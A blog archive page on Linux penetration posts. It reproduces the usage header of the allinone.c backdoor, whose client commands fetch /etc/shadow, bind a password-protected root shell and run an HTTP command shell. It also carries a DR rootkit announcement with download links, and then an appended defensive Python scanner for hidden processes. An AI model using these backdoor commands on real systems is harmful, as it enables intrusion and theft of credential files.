Archive

Posts tagged 'linux pentest'

Methods and channels for obtaining sensitive information after Linux privilege escalation

October 15, 2013 (comments closed)

Original article at http://www.91ri.org/7459.html

Read more…

Linux SSH tunnel backdoors and their detection

December 1, 2010 (4 comments)

I was just discussing this with two heroes in the group chat; here is my summary, reposted to share with everyone.

Read more…

allinone.c for HUC (2002.1)

April 14, 2010 (2 comments)

"Because of false negatives, false positives and the cost of checking, Linux backdoors, whether at the application layer or the kernel layer, are very hard to discover quickly" is a rather depressing fact. I have recently been studying the characteristics of Linux backdoors and cannot help remarking: "lion, as the soul of the Honker Union, was already far ahead of his time in Linux penetration research back in 2002, and absolutely counts as one of the founding fathers of the domestic Linux penetration scene; look at the features of this allinone.c, tailor-made for the pentester, and still a powerful Linux penetration tool even today."

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:)   --> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:)   --> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:)   --> your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates. 
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/

http://packetstormsecurity.org/UNIX/penetration/rootkits/allinone.c

DR Linux 2.6 rootkit released

September 8, 2008 (comments closed)

A Linux rootkit that is hard to detect.

o Hide processes
o Hide network sockets
o Hide files
o Get a remote MOSDEF Node (via hidden userland-backdoor)

The major benefit of the DR rootkit is that all this happens
transparently to the end user. The children of a hidden process are also
automatically hidden. The sockets a hidden process creates are also
hidden. But if you are a hidden process, you can see hidden resources.
This makes the DR rootkit nicely manageable.

DR loads via insmod – we’ve tested the rootkit on a number of Linux
distributions including CentOS and Ubuntu.

The CANVAS support and backdoor logic were written by Daniel Palacio
during his Immunity summer internship. He provided both the kernel hooks
and the userland backdoor to the project.

The rootkit engine (DR.c) was written by Bas Alberts and consists of a
debug register based hooking engine that does not modify the IDT or
syscall table at all. It was written as a reference implementation for
people wanting to experiment with such a rootkit technology, and was
designed to be able to integrate easily into existing syscall hook based
rootkits.

It has known limitations and considerations which you can read about in
the attached README.

You can find the source to the DR rootkit at:

URL: http://www.immunityinc.com/downloads/linux_rootkit_source.tbz2
MD5SUM: 1256523fa8a87949c5e588c981108ee8
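The DR announcement above hides processes from /proc listings while other kernel interfaces still know about them, and that asymmetry is what a defender checks for. The following is an added example, not code from this blog or from Immunity's release: it compares the PIDs that a readdir() of /proc returns against PIDs the kernel acknowledges through kill(pid, 0) and a direct stat of /proc/<pid>, drops thread IDs that belong to a listed process, and intersects two passes so processes that start or exit mid-scan are not reported. It assumes a Linux host; the function names are my own.

```python
import os
import time
def read_pid_max(path: str = "/proc/sys/kernel/pid_max") -> int:
    """Upper bound of the PID space worth probing."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return 32768  # conservative default if the sysctl is unreadable

def pids_from_listing(proc_root: str = "/proc") -> set[int]:
    """PIDs that an ordinary readdir() of /proc reports (what ps and top rely on)."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}

def kernel_acknowledges(pid: int, proc_root: str = "/proc") -> bool:
    """Ask about a PID through interfaces that a filtered readdir() does not cover."""
    try:
        os.kill(pid, 0)         # signal 0 delivers nothing: ESRCH means absent,
        return True             # EPERM means present but owned by another user
    except ProcessLookupError:
        pass
    except PermissionError:
        return True
    # a direct stat of /proc/<pid> often still succeeds when only the listing is filtered
    return os.path.isdir(os.path.join(proc_root, str(pid)))

def thread_group(pid: int, proc_root: str = "/proc") -> int:
    """Tgid from /proc/<pid>/status: the owning PID for a thread, pid itself otherwise."""
    try:
        with open(os.path.join(proc_root, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except (OSError, ValueError, IndexError):
        pass
    return pid

def hidden_pids(listed: set[int], acknowledged: set[int], proc_root: str = "/proc") -> set[int]:
    """Acknowledged but unlisted, minus threads that belong to a listed process."""
    return {p for p in set(acknowledged) - set(listed) if thread_group(p, proc_root) not in listed}

def scan(proc_root: str = "/proc", passes: int = 2, settle: float = 0.5) -> set[int]:
    """Intersect several passes so processes that start or exit mid-scan are not reported."""
    candidates: set[int] = set()
    for i in range(passes):
        time.sleep(settle if i else 0)  # let short-lived processes come and go between passes
        acknowledged = {p for p in range(1, read_pid_max() + 1) if kernel_acknowledges(p, proc_root)}
        found = hidden_pids(pids_from_listing(proc_root), acknowledged, proc_root)
        candidates = found if i == 0 else candidates & found
    return candidates
```

A hook that also filters kill() and stat() would defeat these particular probes, so a scan like this is one signal among several, not proof of a clean host. A full pass over pid_max PIDs takes a few seconds in Python.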